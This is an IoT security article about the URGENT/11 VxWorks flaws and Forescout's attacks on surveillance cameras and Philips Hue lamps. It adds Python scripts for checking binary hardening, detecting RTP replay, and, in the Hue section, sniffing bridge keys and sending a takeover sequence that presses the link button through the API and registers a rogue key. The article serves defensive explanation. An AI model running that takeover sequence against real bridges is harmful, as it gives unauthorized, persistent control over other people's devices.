Securing the Internet of Things (IoT) is the biggest challenge in rolling it out, especially in widespread industrial applications, where the disconnect between operational security and information security poses a major threat to industrial IoT security.
Recent findings show that many embedded devices are vulnerable over the Internet, and the code of practice for consumer IoT security needs to be redefined.
Several serious vulnerabilities have been found in the network stack of the real-time operating system VxWorks. They were discovered by the IT security company Armis. VxWorks is used in firewalls, printers, medical devices and industrial equipment. The flaws were named URGENT/11 because there are eleven of them in total. Since VxWorks does not enable common mitigations such as ASLR in its standard configuration, they are comparatively easy to exploit.
One of the flaws is in the IP stack of VxWorks, four more in the TCP stack. That is one of the reasons the flaws are particularly critical: they can be exploited over the network, and an attacker only has to send a crafted packet to the target. This is especially serious for devices connected directly to the Internet. But even devices that are not directly reachable and sit behind NAT may be attacked under certain circumstances: if the device opens a connection to the outside and an attacker can manipulate that connection, for example from a position on its path, an attack is also possible.
In addition, VxWorks does not appear to use any of the standard mitigation mechanisms found in modern systems, such as address space layout randomization (ASLR), non-executable memory regions, or stack canaries. Such mechanisms, which are standard in all current general-purpose operating systems, often make the exploitation of memory-corruption vulnerabilities harder or even impossible. Although VxWorks optionally supports these mechanisms, Armis said they were not enabled in any of the devices it tested.
The lack of mitigations makes it relatively easy to write exploit code for the vulnerabilities. The Armis researchers demonstrated this with several examples; for instance, they took over a patient monitor used in hospitals and were able to execute code on it and read data from the device.
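The practical consequence of the two paragraphs above is that a device owner cannot assume mitigations are on just because the operating system supports them; they have to be checked on the shipped image. The following checker is an added example, not code from Armis or Wind River. It reads the ELF header and program headers of a 64-bit little-endian ELF file (userland binaries on Linux-based devices, or VxWorks RTP applications, which are ELF; the VxWorks kernel image itself is a different format and is out of scope here) and reports whether the image is position-independent (a precondition for ASLR), whether its stack is marked non-executable, and whether it links the compiler's stack-canary failure handler. Because the example has to run offline, it also constructs a small synthetic ELF image; that image is not loadable and exists only so the checker has something to parse.

```python
import struct

# ELF constants used below (System V ABI / elf.h)
ET_EXEC = 2            # fixed-address executable: the image itself cannot be randomized
ET_DYN = 3             # position-independent executable (PIE): ASLR can relocate it
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4


def elf_hardening(data: bytes) -> dict:
    """Report PIE, non-executable stack and stack-canary evidence for an ELF64 LE image.

    Only the ELF header and program headers are parsed. The canary check is a
    string heuristic: it looks for the GCC/Clang canary failure handler name,
    which shows the binary was built with -fstack-protector, not that every
    function is protected.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("this example handles ELF64 little-endian only")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)

    nx_stack = False   # no PT_GNU_STACK at all: most loaders then make the stack executable
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx_stack = not (p_flags & PF_X)
    return {
        "pie": e_type == ET_DYN,
        "nx_stack": nx_stack,
        "stack_canary": b"__stack_chk_fail" in data,
    }


def make_sample_elf(pie: bool, nx: bool, canary: bool) -> bytes:
    """Construct a minimal synthetic ELF64 image (header, one program header and a
    fake symbol-name blob) so the checker can run offline. Not a loadable binary."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8      # 64-bit, LE, version 1
    e_type = ET_DYN if pie else ET_EXEC
    # e_type e_machine e_version e_entry e_phoff e_shoff e_flags e_ehsize
    # e_phentsize e_phnum e_shentsize e_shnum e_shstrndx
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH",
                               e_type, 62, 1, 0x1000, 64, 0, 0, 64, 56, 1, 64, 0, 0)
    flags = PF_R | PF_W | (0 if nx else PF_X)
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, flags, 0, 0, 0, 0, 0, 16)
    names = b"\x00__stack_chk_fail\x00" if canary else b"\x00printf\x00"
    return ehdr + phdr + names


def missing_mitigations(data: bytes) -> list:
    """Names of the mitigations the image lacks, in a fixed order for reporting."""
    report = elf_hardening(data)
    return [name for name in ("pie", "nx_stack", "stack_canary") if not report[name]]


if __name__ == "__main__":
    # On a real device you would read the extracted binary from disk instead.
    unhardened = make_sample_elf(pie=False, nx=False, canary=False)
    hardened = make_sample_elf(pie=True, nx=True, canary=True)
    print("unhardened image lacks:", missing_mitigations(unhardened))
    print("hardened image lacks:", missing_mitigations(hardened))
```

Run this over binaries pulled from a firmware image rather than trusting vendor statements; a device whose main service comes back with all three entries missing is in the situation the article describes, where a single network-reachable bug becomes a reliable remote code execution.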
Wind River, the manufacturer of VxWorks, has published a security advisory and updates. But these must first be passed on to the customers by the manufacturers of the affected devices. In addition, many of the affected customers may not even know which operating system their devices run.
VxWorks is used in a great many devices. Its customers include numerous major electronics groups such as Siemens, Mitsubishi, Samsung, Ricoh and Xerox. Armis researchers also point out that the affected IP stack, called IPnet, is not only used in VxWorks: Wind River acquired it in 2006, and before that it had been licensed to numerous other manufacturers.
The technical details of the vulnerabilities are published in Armis's whitepaper.
Here is another case: surveillance cameras and Philips Hue lamps attacked over insecure protocols.
Security researchers have managed to send control commands to security cameras and Philips Hue lamps. By default, the devices transmit data and commands in an insecure manner.
In a study, the security company Forescout succeeded in switching off several surveillance cameras or swapping their video streams. Forescout's researchers also outsmarted the smart Philips Hue lighting system. Many devices on the Internet of Things (IoT) use insecure protocols by default, without any encryption. This allows attackers to read and modify the data transferred, up to and including remote control of the devices.
The security researchers bought three surveillance cameras and two Philips Hue lamps and set the devices up in their lab. They then attempted to stop the cameras from delivering video with a denial-of-service (DoS) attack. By default, the cameras used the unencrypted Real-time Transport Protocol (RTP), Real Time Streaming Protocol (RTSP) and RTP Control Protocol (RTCP) for control and video transport, so the researchers could send control commands to the camera and tear down the connection between the camera and the recorder. Alternatively, the connection could be frozen or interrupted by injecting a flood of RTP packets into the video stream. The encrypted variants of the protocols (SRTP, SRTCP), which secure the transmission of data,
In addition to the insecure protocols, Forescout's attacks rest on the assumption that the attacker already has access to the network where the smart devices are located. This access can be obtained, for example, via a vulnerable device reachable from the Internet, via a human, for example through a phishing mail or a USB stick carrying malware, or via a device planted in the network, such as a Raspberry Pi, as Forescout states in the study.
Swapping the surveillance video
Since the recordings of the surveillance cameras are transmitted unencrypted, the security researchers were able, as a first step, to record the video material. Using a control command, they re-initialized the camera and had it stream to another port. On the port originally in use they streamed their previously recorded video material, which the network recorder accepted. What really happened in front of the camera was streamed into nothingness. The attacks worked regardless of manufacturer on all devices that used the insecure protocols, the security researchers explain.
Using the search engine Shodan, they also located 4.6 million cameras accessible via the insecure RTSP protocol. Most are said to be in China, the US and Brazil.
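Both camera attacks described above (the RTP flood that freezes the connection, and the replay of a recorded stream on the port the recorder is listening on) work because RTP carries no authentication: the recorder accepts whatever arrives on the port. The script below is an added example, not Forescout's tooling. It parses the fixed RTP header (RFC 3550), builds packets the way an attacker on the LAN would, and then runs the check a recorder or a passive network sensor could apply: a replayed recording keeps the camera's SSRC but its sequence numbers run backwards, while a freshly crafted stream usually arrives with a different SSRC. The packet capture is constructed inline; the SSRC values, sequence numbers and payload type are assumptions.

```python
import struct
from dataclasses import dataclass

RTP_HEADER = struct.Struct("!BBHII")   # V/P/X/CC, M/PT, sequence, timestamp, SSRC


@dataclass
class RtpHeader:
    payload_type: int
    marker: bool
    seq: int
    timestamp: int
    ssrc: int


def parse_rtp(pkt: bytes) -> RtpHeader:
    """Decode the fixed 12-byte RTP header (RFC 3550); the payload is ignored here."""
    if len(pkt) < RTP_HEADER.size:
        raise ValueError("short RTP packet")
    b0, b1, seq, ts, ssrc = RTP_HEADER.unpack_from(pkt)
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    return RtpHeader(b1 & 0x7F, bool(b1 & 0x80), seq, ts, ssrc)


def build_rtp(seq: int, timestamp: int, ssrc: int, payload: bytes = b"",
              payload_type: int = 96, marker: bool = False) -> bytes:
    """Build an RTP packet; nothing in it is authenticated, which is the whole problem."""
    b0 = 2 << 6
    b1 = (0x80 if marker else 0) | payload_type
    return RTP_HEADER.pack(b0, b1, seq & 0xFFFF, timestamp & 0xFFFFFFFF, ssrc) + payload


def detect_injection(packets, max_gap: int = 50):
    """Flag packets inconsistent with the stream seen so far on one UDP port.

    Returns (index, reason) pairs. Sequence distance is taken modulo 65536 so
    that a normal wrap from 65535 to 0 is not reported.
    """
    alerts = []
    stream_ssrc = None
    last_seq = {}
    for i, pkt in enumerate(packets):
        h = parse_rtp(pkt)
        if stream_ssrc is None:
            stream_ssrc = h.ssrc                      # first SSRC seen defines the stream
        elif h.ssrc != stream_ssrc:
            alerts.append((i, f"unexpected SSRC {h.ssrc:#010x}, stream is {stream_ssrc:#010x}"))
        prev = last_seq.get(h.ssrc)
        if prev is not None:
            delta = (h.seq - prev) & 0xFFFF
            if delta == 0:
                alerts.append((i, f"duplicate sequence number {h.seq}"))
            elif delta >= 0x8000:
                alerts.append((i, f"sequence went backwards {prev} -> {h.seq}"))
            elif delta > max_gap:
                alerts.append((i, f"sequence jumped {prev} -> {h.seq}"))
        last_seq[h.ssrc] = h.seq
    return alerts


def sample_capture():
    """Constructed packets: 8 live camera frames, then 3 frames replayed from an
    earlier recording (same SSRC, old sequence numbers), then 1 packet from a
    different source."""
    cam = 0xCAFEBABE
    live = [build_rtp(1000 + n, 90000 * n, cam, b"live") for n in range(8)]
    replay = [build_rtp(200 + n, 18000 * n, cam, b"old") for n in range(3)]
    foreign = [build_rtp(1, 0, 0xDEADBEEF, b"x")]
    return live + replay + foreign


if __name__ == "__main__":
    for idx, why in detect_injection(sample_capture()):
        print(f"packet {idx}: {why}")
```

Note what the check cannot do: an attacker who records the stream and keeps forwarding it with continued sequence numbers is indistinguishable from the camera at this layer. The actual fix is the one the study names, SRTP/SRTCP (or RTSP over TLS with an authenticated transport), so that replayed or crafted packets fail integrity checks instead of being accepted; the heuristic above is a detection aid for deployments where that is not yet possible.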
The smart lamps from Philips are connected to the local network via a bridge, through which they can be controlled over the network via an API. Commands are authenticated with a token, but this token is also transmitted in plain text and can accordingly be captured by an attacker on the network. With the token, the attacker can send commands to the Hue lamps, for example switch them on and off or make them flash at chosen intervals. Another user can also be added. This should require pressing a physical button on the bridge, but the researchers found that the button can simply be "pressed" virtually through the API as well. Remote access to the lamps from outside the network can also be enabled. According to the study, an attacker could use this to reach the network where the lamps are located from the Internet, which could serve as a foothold for further attacks.
In addition to the insecure protocols, the smart devices themselves often have security holes. Just recently, security researchers showed how easy it is to crack a smart door lock. Previously, Google subsidiary Nest closed a hole that allowed the original owner of a Nest surveillance camera to keep accessing its images after selling it. At the Chaos Communication Congress, a security expert showed how easily a smart bulb can be turned into a Trojan.
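The Hue attack in the paragraph before last comes down to one fact: in the bridge's v1 (CLIP) API the application key travels as a path segment of a plaintext HTTP request, so anyone who can see the traffic holds the key. The script below is an added example, not Forescout's code. It extracts keys from a constructed plaintext capture and serializes the request sequence the study describes: flash a lamp, "press" the link button through the API, then register a new application key. Paths and JSON attribute names follow the public Hue v1 API (`lights/<id>/state`, `config` with `linkbutton`, `POST /api` with `devicetype`); the bridge address, the key and the capture are constructed for the example, and whether a given bridge firmware still honours the software link button should be verified rather than assumed.

```python
import json
import re

# A Hue v1 API request carries the application key as the second path segment.
# The unauthenticated endpoint /api/config has no key and is excluded by the
# minimum length (real keys are much longer than "config").
HUE_REQUEST_LINE = re.compile(
    r"^(?P<method>GET|PUT|POST|DELETE) /api/(?P<token>[A-Za-z0-9-]{10,})(?P<rest>/\S*)? HTTP/1\.[01]",
    re.MULTILINE,
)


def extract_hue_tokens(plaintext_capture: str) -> set:
    """Recover application keys from captured, unencrypted HTTP traffic to a bridge."""
    return {m.group("token") for m in HUE_REQUEST_LINE.finditer(plaintext_capture)}


def hue_request(method: str, path: str, body: dict, host: str) -> str:
    """Serialize one HTTP/1.1 request to the bridge as it would appear on the wire."""
    payload = json.dumps(body)
    return (
        f"{method} {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: application/json\r\n"
        f"Content-Length: {len(payload)}\r\n\r\n{payload}"
    )


def takeover_sequence(token: str, host: str, light_id: int = 1) -> list:
    """Requests an attacker holding a sniffed key can send, in order:
    1. make the lamp flash ("lselect" flashes for a short period),
    2. set the link button through the API instead of pressing it on the bridge,
    3. register a new application key, which outlives the victim's own key."""
    return [
        hue_request("PUT", f"/api/{token}/lights/{light_id}/state", {"alert": "lselect"}, host),
        hue_request("PUT", f"/api/{token}/config", {"linkbutton": True}, host),
        hue_request("POST", "/api", {"devicetype": "rogue_app#lab_pi"}, host),
    ]


# Constructed sample: what a sniffer on the LAN sees when the official app toggles a lamp,
# followed by an unauthenticated request that carries no key.
SAMPLE_CAPTURE = (
    "PUT /api/Xr7kQ2pL9mTv4wZs8bNc1dFg3hJk5yUa6eRt0iOp/lights/3/state HTTP/1.1\r\n"
    "Host: 192.168.1.50\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: 12\r\n\r\n"
    '{"on": true}'
    "\r\n"
    "GET /api/config HTTP/1.1\r\n"
    "Host: 192.168.1.50\r\n\r\n"
)


if __name__ == "__main__":
    for key in extract_hue_tokens(SAMPLE_CAPTURE):
        print("captured key:", key)
        for req in takeover_sequence(key, "192.168.1.50"):
            print(req.split("\r\n")[0])
```

The third request is the one that matters for persistence: once the attacker has their own key, revoking the app's key or changing the Wi-Fi password does not lock them out. Since the whole chain presumes a position on the LAN, segmenting IoT devices from user workstations and, where the bridge firmware offers it, talking to the bridge only over TLS removes both the sniffing opportunity and the plaintext key.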
Author Profile
- Amram David
- Amram is a technical analyst and partner at DFI Club Research, a high-tech research and advisory firm. He has over 10 years of technical and business experience with leading high-tech companies including Huawei, Nokia and Ericsson in ICT, semiconductors, microelectronic systems and embedded systems. Amram focuses on the business-critical points where new technologies drive innovation.